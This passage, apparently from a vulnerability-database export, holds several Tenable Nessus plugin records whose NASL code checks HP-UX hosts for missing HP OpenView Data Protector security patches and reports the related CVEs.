value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36589 : s700_800 11.X OV DP6.00 IA-64 patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36589 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36589 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36589\", \"PHSS_37302\", \"PHSS_37821\", \"PHSS_38405\", \"PHSS_39106\", \"PHSS_39794\", \"PHSS_40171\", \"PHSS_40567\", \"PHSS_41264\", \"PHSS_41869\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_37383.NASL", "href": "https://www.tenable.com/plugins/nessus/43141", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_37383 : s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_37383. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43141);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_37383 : s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 OV DP5.50 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_37383 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_37383 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_37383\", \"PHSS_38723\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-FRA-LS-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-JPN-LS-P\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36622.NASL", "href": "https://www.tenable.com/plugins/nessus/43136", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36622 : s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36622. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43136);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36622 : s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36622 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36622 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36622\", \"PHSS_37173\", \"PHSS_37816\", \"PHSS_38402\", \"PHSS_38741\", \"PHSS_38943\", \"PHSS_39015\", \"PHSS_39730\", \"PHSS_40079\", \"PHSS_40562\", \"PHSS_41261\", \"PHSS_41866\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.06.00\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 PA-RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36588.NASL", "href": "https://www.tenable.com/plugins/nessus/43134", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36588 : s700_800 11.X OV DP6.00 PA-RISC patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36588. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43134);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36588 : s700_800 11.X OV DP6.00 PA-RISC patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 PA-RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36588 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36588 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36588\", \"PHSS_37301\", \"PHSS_37820\", \"PHSS_38404\", \"PHSS_39105\", \"PHSS_39793\", \"PHSS_40170\", \"PHSS_40566\", \"PHSS_41263\", \"PHSS_41868\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_37382.NASL", "href": "https://www.tenable.com/plugins/nessus/43140", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_37382 : s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_37382. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43140);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_37382 : s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP5.50 PA-RISC patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_37382 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_37382 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_37382\", \"PHSS_38722\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-FRA-LS-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.05.50\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-JPN-LS-P\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.23 OV DP5.50 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36800.NASL", "href": "https://www.tenable.com/plugins/nessus/43139", "published": "2009-12-14T00:00:00", 